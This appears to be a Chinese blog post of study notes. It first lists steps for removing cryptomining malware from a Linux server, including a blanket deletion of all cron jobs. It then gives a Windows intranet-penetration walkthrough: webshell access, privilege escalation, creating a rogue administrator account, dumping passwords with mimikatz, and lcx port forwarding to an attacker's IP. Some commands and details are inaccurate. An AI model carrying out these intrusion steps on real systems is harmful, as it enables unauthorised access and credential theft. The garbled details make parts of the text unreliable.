本文已参与「新人创作礼」活动,一起开启掘金创作之路。
2、整体操作流程
确定挖矿进程
执行ps aux查看是否有其它可疑进程全部杀死并删除pid(删除pid的前提要杀掉进程),在实际的清除工作中,应找到本机上运行的挖矿脚本,根据脚本的执行流程确定木马的驻留方式,并按照顺序进行清除,避免清除不彻底。
killall 进程名
rm -fr /proc/pid
第一步最关键,一定要在ps aux仔细查找可疑进程并要和pid一并杀掉删除
及时隔离主机
部分带有蠕虫功能的挖矿木马在取得本机的控制权后,会以本机为跳板机,对同一局域网内的其他主机进行已知漏洞的扫描和进一步利用,所以发现挖矿现象后,在不影响业务的前提下应该及时隔离受感染主机,然后进行下一步分析。
阻断与矿池的通信
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
清除定时任务
tail /var/log/cron #查看定时任务日志
ls /var/spool/cron #查看不同用户的定时任务
rm -rf /var/spool/cron/* #删除所有用户级的定时任务
清除启动项
rm -f /etc/init.d/muma(开机自启动的)
清除公钥文件
查看是否有不该存在的特权用户
修改root密码且修改sshd端口
禁ping
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
openssh打补丁(升级),因为主要原因是ssh漏洞导致木马入侵
查杀完成后重启服务器,然后分别持续观察下面两个位置的日志:
tail -f /var/log/cron
tail -f /var/log/messages
内网渗透的基本思路
拿到外网web服务器权限
比如通过蚁件一句话木马,连接到后台,然后打开终端 whoami 查看自己的身份
设法提权
1、查看systeminfo,重点关注操作系统版本,位数(64/32)补丁编号如果没有kb423377(巴西烤肉漏洞)提权
2、ipconfig(查看肉鸡连接几个网卡,连接几个网络 )
3、netstat -ano(查看都有哪些内网主机与本机通信)
netstat -an | findstr "3389"查看端口
4、创建用户
net user bb bb@12345 /add #添加用户
net localgroup administrators bb /add #将用户添加到管理组
net user #查看用户
5、窃取administrator的密码
工具 mimitakz
工具用法: 双击mimitakz.exe ,
mimitakz:
privilege::debug
sekurlsa::logonpasswords 如果是密文(用kali软件)
6.利用新账号或administrator登录。登远程桌面(mstsc)
7.向肉鸡上传lcx.exe文件
8.在黑客机上执行 lcx.exe -listen 44444 55555
9.在肉鸡上执行 lcx.exe -slave 黑客 IP 44444 127.0.0.1 3389
在靶机上运行lcx.exe注意这个软件上传路径,在终端下要进入这个命令才能运行。
10.在黑客机上打开mstsc 127.0.0.1:55555
